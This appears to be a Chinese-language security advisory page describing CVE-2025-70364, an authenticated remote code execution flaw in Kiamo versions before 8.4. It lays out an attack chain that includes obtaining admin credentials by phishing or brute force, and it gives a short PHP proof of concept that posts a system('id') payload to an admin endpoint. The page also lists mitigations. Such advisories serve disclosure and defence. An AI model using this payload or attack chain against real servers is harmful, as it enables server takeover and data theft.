IPBUF安全漏洞报告
English
CVE-2025-70364 CVSS 8.8 高危

CVE-2025-70364 Kiamo远程代码执行漏洞

披露日期: 2026-04-09

漏洞信息

漏洞编号
CVE-2025-70364
漏洞类型
远程代码执行 (RCE)
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Kiamo

相关标签

RCE远程代码执行KiamoPHP代码注入权限提升

漏洞概述

Kiamo 8.4之前版本存在高危远程代码执行漏洞。该漏洞允许经过身份验证的管理员利用产品的历史管理功能在服务器端执行任意PHP代码。尽管供应商声称这是预期功能,但缺乏严格的限制使得攻击者可以完全接管服务器,导致敏感信息泄露及系统完整性受损。

技术细节

该漏洞的核心在于Kiamo 8.4之前的版本允许管理员用户在服务器端执行任意PHP代码。供应商虽然辩称这是一个历史性的管理功能,但在实现上未对危险函数进行有效隔离。攻击者获得管理员权限后,可通过特定的管理接口提交恶意PHP代码(如Webshell)。服务器端解析引擎会直接执行这些代码,结合system、exec等函数,攻击者即可在操作系统层面执行任意命令,从而完全控制服务器。

攻击链分析

STEP 1
1. 信息收集
攻击者侦察目标网络,寻找Kiamo服务的实例,并尝试获取管理员凭证(通过钓鱼、暴力破解或其他手段)。
STEP 2
2. 身份验证
攻击者使用获取的管理员凭证登录Kiamo管理后台。
STEP 3
3. 漏洞利用
攻击者访问允许执行PHP代码的管理功能页面,输入恶意的PHP代码(如system命令)并提交。
STEP 4
4. 执行攻击
服务器解析并执行攻击者提交的PHP代码,返回系统命令执行结果,攻击者获得服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<?php /* * PoC for CVE-2025-70364: Kiamo Authenticated RCE * Description: Conceptual exploit demonstrating code execution. */ // Target URL (Hypothetical endpoint based on admin feature) $url = "http://target-kiamo/admin/execute.php"; // Payload to execute 'id' command $payload = "<?php system('id'); ?>"; // Simulate HTTP POST request as authenticated admin $postData = [ 'php_code' => $payload ]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData)); curl_setopt($ch, CURLOPT_COOKIE, "admin_session=valid_session_cookie"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); // Output server response echo $response; ?>

影响范围

Kiamo < 8.4

防御指南

临时缓解措施
如果无法立即升级,应严格限制对Kiamo管理后台的访问来源IP,并加强对管理员账户的安全监控,确保未被滥用。同时,可尝试通过应用层规则禁用system、exec等高危PHP函数的调用。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表